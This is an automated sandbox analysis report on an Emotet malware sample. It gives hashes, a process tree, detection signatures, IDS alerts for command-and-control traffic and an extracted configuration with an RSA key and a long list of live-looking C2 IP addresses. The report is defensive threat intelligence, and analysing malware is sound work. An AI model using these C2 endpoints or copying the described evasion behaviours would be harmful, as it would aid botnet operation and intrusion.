Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mNtu4X8ZyE.exe

Overview

General Information

Sample name:mNtu4X8ZyE.exe
renamed because original name is a hash value
Original sample name:3d1ad8f5c275b10be10f06b5505bee6ae6c80e60.exe
Analysis ID:1553820
MD5:6e30d8bda11412a2272a387b549be17a
SHA1:3d1ad8f5c275b10be10f06b5505bee6ae6c80e60
SHA256:c3ad80d9e8443b1beae2dfe76227770b83fa852b9226f91a5628cb06624d8d9c
Tags:exeuser-NDA0E
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mNtu4X8ZyE.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\mNtu4X8ZyE.exe" MD5: 6E30D8BDA11412A2272A387B549BE17A)
    • regedit.exe (PID: 7464 cmdline: "C:\Windows\SysWOW64\expand\regedit.exe" MD5: 6E30D8BDA11412A2272A387B549BE17A)
      • wpnclient.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\winhttpcom\wpnclient.exe" MD5: 6E30D8BDA11412A2272A387B549BE17A)
  • svchost.exe (PID: 7496 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["190.202.229.74:80", "118.69.11.81:7080", "70.39.251.94:8080", "87.230.25.43:8080", "94.23.62.116:8080", "37.187.161.206:8080", "45.46.37.97:80", "138.97.60.141:7080", "177.144.130.105:8080", "169.1.39.242:80", "209.236.123.42:8080", "202.134.4.210:7080", "193.251.77.110:80", "2.45.176.233:80", "217.13.106.14:8080", "189.223.16.99:80", "190.101.156.139:80", "77.238.212.227:80", "181.58.181.9:80", "37.183.81.217:80", "74.58.215.226:80", "174.118.202.24:443", "168.197.45.36:80", "81.215.230.173:443", "192.175.111.212:7080", "216.47.196.104:80", "128.92.203.42:80", "94.176.234.118:443", "191.182.6.118:80", "212.71.237.140:8080", "24.232.228.233:80", "177.73.0.98:443", "177.23.7.151:80", "24.135.69.146:80", "83.169.21.32:7080", "189.34.181.88:80", "179.222.115.170:80", "177.144.130.105:443", "213.197.182.158:8080", "5.89.33.136:80", "77.78.196.173:443", "120.72.18.91:80", "50.28.51.143:8080", "190.64.88.186:443", "111.67.12.221:8080", "12.162.84.2:8080", "46.105.114.137:8080", "59.148.253.194:8080", "201.213.177.139:80", "82.76.52.155:80", "172.104.169.32:8080", "188.251.213.180:80", "46.43.2.95:8080", "137.74.106.111:7080", "188.135.15.49:80", "185.94.252.27:443", "197.232.36.108:80", "60.249.78.226:8080", "187.162.248.237:80", "181.129.96.162:8080", "46.101.58.37:8080", "109.242.153.9:80", "178.211.45.66:8080", "200.59.6.174:80", "83.103.179.156:80", "172.86.186.21:8080", "70.32.115.157:8080", "81.214.253.80:443", "201.49.239.200:443", "149.202.72.142:7080", "190.45.24.210:80", "186.189.249.2:80", "219.92.13.25:80", "170.81.48.2:80", "51.75.33.127:80", "192.241.143.52:8080", "45.33.77.42:8080", "152.169.22.67:80", "1.226.84.243:8080", "78.206.229.130:80", "37.179.145.105:80", "68.183.170.114:8080", "192.232.229.54:7080", "103.236.179.162:80", "70.32.84.74:8080", "79.118.74.90:80", "60.93.23.51:80", "181.120.29.49:80", "213.52.74.198:80", "51.255.165.160:8080", "183.176.82.231:80", "186.193.229.123:80", "98.103.204.12:443", "129.232.220.11:8080", "181.61.182.143:80", "68.183.190.199:8080", "190.115.18.139:8080", "200.24.255.23:80", "103.13.224.53:80", "85.214.26.7:8080", "190.24.243.186:80", "87.106.46.107:8080", "177.107.79.214:8080", "12.163.208.58:80", "187.162.250.23:443", "109.101.137.162:8080", "82.76.111.249:443", "181.30.61.163:443", "5.196.35.138:7080", "51.15.7.145:80", "192.198.91.138:443", "188.157.101.114:80", "189.2.177.210:443", "181.123.6.86:80", "109.190.35.249:80", "45.16.226.117:443", "190.190.219.184:80", "104.131.41.185:8080", "101.187.81.254:80", "62.84.75.50:80", "178.250.54.208:8080", "201.71.228.86:80", "190.92.122.226:80", "138.97.60.140:8080"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.2541675452.0000000000590000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000002.00000002.1322151004.0000000001FD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000000.00000002.1306249932.0000000002614000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            0.2.mNtu4X8ZyE.exe.221052e.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              2.2.regedit.exe.1fd279e.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                4.2.wpnclient.exe.21e0000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.2.regedit.exe.1fd052e.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    0.2.mNtu4X8ZyE.exe.221279e.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 10 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 70.39.251.94, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\winhttpcom\wpnclient.exe, Initiated: true, ProcessId: 7580, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49936
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 7496, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-11T18:22:34.128040+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749798TCP
                      2024-11-11T18:23:14.538600+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749980TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-11T18:22:36.385675+010020350771A Network Trojan was detected192.168.2.749766190.202.229.7480TCP
                      2024-11-11T18:22:56.826697+010020350771A Network Trojan was detected192.168.2.74993670.39.251.948080TCP
                      2024-11-11T18:23:08.796039+010020350771A Network Trojan was detected192.168.2.74997887.230.25.438080TCP
                      2024-11-11T18:23:20.800044+010020350771A Network Trojan was detected192.168.2.74997994.23.62.1168080TCP
                      2024-11-11T18:23:32.953468+010020350771A Network Trojan was detected192.168.2.74998337.187.161.2068080TCP
                      2024-11-11T18:23:45.064324+010020350771A Network Trojan was detected192.168.2.74998445.46.37.9780TCP
                      2024-11-11T18:23:57.482018+010020350771A Network Trojan was detected192.168.2.749985138.97.60.1417080TCP
                      2024-11-11T18:24:08.284550+010020350771A Network Trojan was detected192.168.2.749986177.144.130.1058080TCP
                      2024-11-11T18:24:20.133558+010020350771A Network Trojan was detected192.168.2.749987169.1.39.24280TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: mNtu4X8ZyE.exeAvira: detected
                      Source: 4.2.wpnclient.exe.59052e.1.raw.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["190.202.229.74:80", "118.69.11.81:7080", "70.39.251.94:8080", "87.230.25.43:8080", "94.23.62.116:8080", "37.187.161.206:8080", "45.46.37.97:80", "138.97.60.141:7080", "177.144.130.105:8080", "169.1.39.242:80", "209.236.123.42:8080", "202.134.4.210:7080", "193.251.77.110:80", "2.45.176.233:80", "217.13.106.14:8080", "189.223.16.99:80", "190.101.156.139:80", "77.238.212.227:80", "181.58.181.9:80", "37.183.81.217:80", "74.58.215.226:80", "174.118.202.24:443", "168.197.45.36:80", "81.215.230.173:443", "192.175.111.212:7080", "216.47.196.104:80", "128.92.203.42:80", "94.176.234.118:443", "191.182.6.118:80", "212.71.237.140:8080", "24.232.228.233:80", "177.73.0.98:443", "177.23.7.151:80", "24.135.69.146:80", "83.169.21.32:7080", "189.34.181.88:80", "179.222.115.170:80", "177.144.130.105:443", "213.197.182.158:8080", "5.89.33.136:80", "77.78.196.173:443", "120.72.18.91:80", "50.28.51.143:8080", "190.64.88.186:443", "111.67.12.221:8080", "12.162.84.2:8080", "46.105.114.137:8080", "59.148.253.194:8080", "201.213.177.139:80", "82.76.52.155:80", "172.104.169.32:8080", "188.251.213.180:80", "46.43.2.95:8080", "137.74.106.111:7080", "188.135.15.49:80", "185.94.252.27:443", "197.232.36.108:80", "60.249.78.226:8080", "187.162.248.237:80", "181.129.96.162:8080", "46.101.58.37:8080", "109.242.153.9:80", "178.211.45.66:8080", "200.59.6.174:80", "83.103.179.156:80", "172.86.186.21:8080", "70.32.115.157:8080", "81.214.253.80:443", "201.49.239.200:443", "149.202.72.142:7080", "190.45.24.210:80", "186.189.249.2:80", "219.92.13.25:80", "170.81.48.2:80", "51.75.33.127:80", "192.241.143.52:8080", "45.33.77.42:8080", "152.169.22.67:80", "1.226.84.243:8080", "78.206.229.130:80", "37.179.145.105:80", "68.183.170.114:8080", "192.232.229.54:7080", "103.236.179.162:80", "70.32.84.74:8080", "79.118.74.90:80", "60.93.23.51:80", "181.120.29.49:80", "213.52.74.198:80", "51.255.165.160:8080", "183.176.82.231:80", "186.193.229.123:80", "98.103.204.12:443", "129.232.220.11:8080", "181.61.182.143:80", "68.183.190.199:8080", "190.115.18.139:8080", "200.24.255.23:80", "103.13.224.53:80", "85.214.26.7:8080", "190.24.243.186:80", "87.106.46.107:8080", "177.107.79.214:8080", "12.163.208.58:80", "187.162.250.23:443", "109.101.137.162:8080", "82.76.111.249:443", "181.30.61.163:443", "5.196.35.138:7080", "51.15.7.145:80", "192.198.91.138:443", "188.157.101.114:80", "189.2.177.210:443", "181.123.6.86:80", "109.190.35.249:80", "45.16.226.117:443", "190.190.219.184:80", "104.131.41.185:8080", "101.187.81.254:80", "62.84.75.50:80", "178.250.54.208:8080", "201.71.228.86:80", "190.92.122.226:80", "138.97.60.140:8080"]}
                      Source: mNtu4X8ZyE.exeReversingLabs: Detection: 78%
                      Source: mNtu4X8ZyE.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowExA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401600
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowExA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,2_2_00401600
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowExA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,4_2_00401600
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,4_2_021E2680
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E22C0 CryptExportKey,CryptDestroyHash,memcpy,CryptEncrypt,RtlAllocateHeap,CryptDuplicateHash,CryptGetHashParam,4_2_021E22C0
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E1FF0 memcpy,CryptDuplicateHash,CryptDestroyHash,RtlAllocateHeap,4_2_021E1FF0
                      Source: mNtu4X8ZyE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02673A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,0_2_02673A20
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,2_2_021B3A20
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,4_2_021E3A20

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49936 -> 70.39.251.94:8080
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49978 -> 87.230.25.43:8080
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49983 -> 37.187.161.206:8080
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49766 -> 190.202.229.74:80
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49979 -> 94.23.62.116:8080
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49984 -> 45.46.37.97:80
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49987 -> 169.1.39.242:80
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49986 -> 177.144.130.105:8080
                      Source: Network trafficSuricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.7:49985 -> 138.97.60.141:7080
                      Source: Malware configuration extractorIPs: 190.202.229.74:80
                      Source: Malware configuration extractorIPs: 118.69.11.81:7080
                      Source: Malware configuration extractorIPs: 70.39.251.94:8080
                      Source: Malware configuration extractorIPs: 87.230.25.43:8080
                      Source: Malware configuration extractorIPs: 94.23.62.116:8080
                      Source: Malware configuration extractorIPs: 37.187.161.206:8080
                      Source: Malware configuration extractorIPs: 45.46.37.97:80
                      Source: Malware configuration extractorIPs: 138.97.60.141:7080
                      Source: Malware configuration extractorIPs: 177.144.130.105:8080
                      Source: Malware configuration extractorIPs: 169.1.39.242:80
                      Source: Malware configuration extractorIPs: 209.236.123.42:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 193.251.77.110:80
                      Source: Malware configuration extractorIPs: 2.45.176.233:80
                      Source: Malware configuration extractorIPs: 217.13.106.14:8080
                      Source: Malware configuration extractorIPs: 189.223.16.99:80
                      Source: Malware configuration extractorIPs: 190.101.156.139:80
                      Source: Malware configuration extractorIPs: 77.238.212.227:80
                      Source: Malware configuration extractorIPs: 181.58.181.9:80
                      Source: Malware configuration extractorIPs: 37.183.81.217:80
                      Source: Malware configuration extractorIPs: 74.58.215.226:80
                      Source: Malware configuration extractorIPs: 174.118.202.24:443
                      Source: Malware configuration extractorIPs: 168.197.45.36:80
                      Source: Malware configuration extractorIPs: 81.215.230.173:443
                      Source: Malware configuration extractorIPs: 192.175.111.212:7080
                      Source: Malware configuration extractorIPs: 216.47.196.104:80
                      Source: Malware configuration extractorIPs: 128.92.203.42:80
                      Source: Malware configuration extractorIPs: 94.176.234.118:443
                      Source: Malware configuration extractorIPs: 191.182.6.118:80
                      Source: Malware configuration extractorIPs: 212.71.237.140:8080
                      Source: Malware configuration extractorIPs: 24.232.228.233:80
                      Source: Malware configuration extractorIPs: 177.73.0.98:443
                      Source: Malware configuration extractorIPs: 177.23.7.151:80
                      Source: Malware configuration extractorIPs: 24.135.69.146:80
                      Source: Malware configuration extractorIPs: 83.169.21.32:7080
                      Source: Malware configuration extractorIPs: 189.34.181.88:80
                      Source: Malware configuration extractorIPs: 179.222.115.170:80
                      Source: Malware configuration extractorIPs: 177.144.130.105:443
                      Source: Malware configuration extractorIPs: 213.197.182.158:8080
                      Source: Malware configuration extractorIPs: 5.89.33.136:80
                      Source: Malware configuration extractorIPs: 77.78.196.173:443
                      Source: Malware configuration extractorIPs: 120.72.18.91:80
